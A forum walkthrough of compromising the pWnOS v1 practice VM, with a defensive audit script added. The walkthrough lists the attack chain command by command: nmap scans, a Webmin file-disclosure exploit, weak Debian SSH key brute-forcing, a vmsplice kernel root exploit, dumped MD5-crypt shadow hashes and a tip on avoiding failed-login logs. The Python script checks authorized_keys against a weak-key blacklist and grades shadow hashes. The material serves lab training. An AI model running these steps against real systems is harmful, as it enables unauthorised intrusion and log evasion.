[Video] Attacking - pWnOS
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3388825
Download video: http://www.mediafire.com/?65b0nursilwfyaf
What is this?
This is my walk through of how I broke into pWnOS v1.
pWnOS is a "VM image" that creates a target on which to practice penetration testing, with the "end goal" being to get root. It was designed to practice using exploits, with multiple entry points.
Scenario
A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.
It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. :)
What do I need?
> BackTrack 4 (Final)
> pWnOS.vmdk
> exploit-db.com or milw0rm.
Software
Name: pWnOS
Version: 1
Home Page: http://0dayclub.com/files/pWnOS%20v1.0.zip
Download Link:
Forum/Support: http://forums.heorot.net/viewforum.php?f=21
Commands:
nmap 192.168.3.1-255
nmap -sV -sS -O 192.168.3.100
firefox http://192.168.3.100
firefox http://192.168.3.100:10000
firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
*Webmin <> save. Filename: shadow
firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
http://milw0rm.com/exploits/5622 (perl)
http://milw0rm.com/exploits/5720 (python)
http://milw0rm.com/exploits/5632 (ruby)
http://www.exploit-db.com/exploits/5622 (perl)
http://www.exploit-db.com/exploits/5720 (python)
http://www.exploit-db.com/exploits/5632 (ruby)
wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
*scans for the public key...*
ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
exit
ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
hostname
uname -a
firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
http://milw0rm.com/exploits/5092 (c)
http://www.exploit-db.com/exploits/5092 (c)
nano vmsplice.c
gcc vmsplice.c -o vmsplice
./vmsplice
whoami
----------------------------------------------------------------------------------------------------
Users
root: root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
I had problems with the Debian OpenSSH/OpenSSL exploit: sometimes it would work, otherwise it would be really slow or just couldn't find the correct exploit file. The method which I use turns it into an offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for reading it). It relies on the default path though!
This is one method of getting in; the author did say that there are multiple ways in!
It also took me a bit of work to get it working with VirtualBox and static IP addresses.
Read my post here (short answer - need to configure another interface via another OS)
Song: Deadmau5 - Faxing Berlin
Video length: 07:37
Capture length: 14:55
Blog Post: http://g0tmi1k.blogspot.com/2010/04/video-pwnos.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html#post9217 OR http://forums.heorot.net/viewtopic.php?f=21&t=391&p=1956#p1956
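The two weaknesses the walkthrough leans on, SSH keys generated by the broken Debian OpenSSL PRNG sitting in authorized_keys and password hashes still stored as MD5-crypt ($1$), are both things a host audit can catch before anyone exploits them. The script below is an added example, not part of the original post or of pWnOS: it fingerprints every entry of an authorized_keys file and compares it against a blacklist of known-weak key fingerprints (the approach Debian's ssh-vulnkey took, simplified here to a set of SHA256 fingerprints rather than the real blacklist files), and grades each shadow entry by its crypt identifier. The authorized_keys content and the blacklist are constructed for the demo; the shadow lines are the ones listed in the post.

```python
"""Host hygiene checks for the two weaknesses showcased in the pWnOS video:
weak Debian-PRNG SSH keys in authorized_keys and MD5-crypt password hashes.
Added example; blacklist and sample authorized_keys are constructed."""
import base64
import binascii
import hashlib
import re

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-")

# crypt(3) identifiers as they appear in /etc/shadow, and how a current audit grades them.
CRYPT_ALGORITHMS = {
    "1": ("md5crypt", "weak"),
    "2a": ("bcrypt", "ok"), "2b": ("bcrypt", "ok"), "2y": ("bcrypt", "ok"),
    "5": ("sha256crypt", "ok"),
    "6": ("sha512crypt", "ok"),
    "7": ("scrypt", "ok"),
    "y": ("yescrypt", "ok"),
}


def key_fingerprint(blob_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 public-key blob."""
    raw = base64.b64decode(blob_b64, validate=True)   # raises binascii.Error on junk
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys_line(line: str):
    """Split one authorized_keys line into (options, keytype, blob, comment).
    Returns None for blank and comment lines; raises ValueError when no key is found.
    Options are assumed to contain no whitespace (a simplification for this demo)."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if tok.startswith(KEY_TYPES):
            if i + 1 >= len(tokens):
                raise ValueError("key type without key blob")
            return " ".join(tokens[:i]), tok, tokens[i + 1], " ".join(tokens[i + 2:])
    raise ValueError("no key type token found")


def audit_authorized_keys(text: str, blacklist: set) -> list:
    """One report entry per key line: status is 'blacklisted', 'ok' or 'unparseable'."""
    report = []
    for n, line in enumerate(text.splitlines(), 1):
        try:
            parsed = parse_authorized_keys_line(line)
            if parsed is None:
                continue
            options, ktype, blob, comment = parsed
            fp = key_fingerprint(blob)
        except (ValueError, binascii.Error) as exc:
            # A line sshd cannot parse is still worth surfacing: it may be tampering or rot.
            report.append({"line": n, "status": "unparseable", "detail": str(exc)})
            continue
        report.append({"line": n, "status": "blacklisted" if fp in blacklist else "ok",
                       "type": ktype, "fingerprint": fp, "options": options,
                       "comment": comment})
    return report


SHADOW_RE = re.compile(r"^(?P<user>[^:]+):(?P<hash>[^:]*):(?P<change>\d*):")


def audit_shadow(text: str) -> list:
    """Grade each shadow entry by hash scheme. Empty hashes are weak, '!'/'*'
    entries are locked, and a hash with no $id$ prefix is treated as legacy DES."""
    report = []
    for line in text.splitlines():
        m = SHADOW_RE.match(line.strip())
        if not m:
            continue
        user, h = m.group("user"), m.group("hash")
        if h == "":
            algo, grade = "empty", "weak"
        elif h[0] in "!*":
            algo, grade = "locked", "ok"
        elif h.startswith("$"):
            algo, grade = CRYPT_ALGORITHMS.get(h.split("$")[1], ("unknown", "review"))
        else:
            algo, grade = "descrypt", "weak"
        report.append({"user": user, "algorithm": algo, "grade": grade})
    return report


def _fake_blob(tag: str) -> str:
    """Constructed key blob: only needs to be valid base64 for fingerprinting."""
    return base64.b64encode(b"\x00\x00\x00\x07ssh-rsa" + tag.encode()).decode()


# Constructed sample authorized_keys; line 5 is deliberately malformed.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample file",
    f"ssh-rsa {_fake_blob('weak-key-A')} vmware@ubuntuvm",
    f"ssh-rsa {_fake_blob('good-key-B')} admin@workstation",
    f'command="/usr/bin/backup" ssh-rsa {_fake_blob("weak-key-C")} backup@host',
    "ssh-rsa not-base64!!! broken@host",
])
# Constructed blacklist standing in for the real weak-key fingerprint lists.
WEAK_KEY_BLACKLIST = {key_fingerprint(_fake_blob("weak-key-A")),
                      key_fingerprint(_fake_blob("weak-key-C"))}

# The five shadow entries listed in the post.
SAMPLE_SHADOW = """root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::"""

if __name__ == "__main__":
    for entry in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_KEY_BLACKLIST):
        print(entry)
    for entry in audit_shadow(SAMPLE_SHADOW):
        print(entry)
```

Run against the sample data, the key audit flags the two blacklisted entries and reports the malformed line instead of crashing on it, and the shadow audit grades all five pWnOS accounts as md5crypt/weak. The point the note about auth.log makes cuts the other way for a defender: because the weak-key attack needs no failed logins, the blacklist check on authorized_keys (and rotating anything it flags) is the control that matters, not log review.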
Re : [Video] Attacking - pWnOS
Re: [Video] Attacking - pWnOS
Thank you for all these videos.
You have made a great job!!!
Re: [Video] Attacking - pWnOS
Amazing video. Really liked it. Thanks for the share.
Re: [Video] Attacking - pWnOS
Ow nice, good job, thanks for sharing.
Re: [Video] Attacking - pWnOS
Quote:
Originally Posted by
Shemsu-Hor
Very nice ! Thanks
Quote:
Originally Posted by
jayp75
Thank you for all these videos.
You have made a great job!!!
Quote:
Originally Posted by
D4rk357
Amazing video. Really liked it. Thanks for the share.
Quote:
Originally Posted by
hitasb
Ow nice, good job, thanks for sharing.
Thanks for the thanks guys!
Re: [Video] Attacking - pWnOS
Really appreciate all your videos mate, easy to follow and straight to the point, so kudos for that!
When it comes to pWnOS I have a few problems, if you don't mind.
When I fire it up in vmware, I come to the "ubuntuvm login:" screen, and I guess not having the password is basically the challenge, but the thing is I can't find it on my network? All my other VMs have net access just fine, but I have to usually do some stuff (like /etc/init.d/networking restart on bt4r1) after I'm logged in. Do you have any ideas on how to solve this?
I've tried to nmap the 192.168.110.1-255 range (where all the other VMs chill), but I just can't find it.
Tips?
Re: [Video] Attacking - pWnOS
Quote:
Originally Posted by
hucker
Really appreciate all your videos mate, easy to follow and straight to the point, so kudos for that!
When it comes to pWnOS I have a few problems, if you don't mind.
When I fire it up in vmware, I come to the "ubuntuvm login:" screen, and I guess not having the password is basically the challenge, but the thing is I can't find it on my network? All my other VMs have net access just fine, but I have to usually do some stuff (like /etc/init.d/networking restart on bt4r1) after I'm logged in. Do you have any ideas on how to solve this?
I've tried to nmap the 192.168.110.1-255 range (where all the other VMs chill), but I just can't find it.
Tips?
Thanks for the thanks.
I would like to say, just because nmap doesn't see it - how do you know it's not there? You may have "tripped" something ;)
Anyway, I also had an IP issue with it - hence the few lines in the "note" section.
Quote:
It also took me a bit of work to get it working with VirtualBox and static IP addresses.
Read my post here (short answer - need to configure another interface via another OS)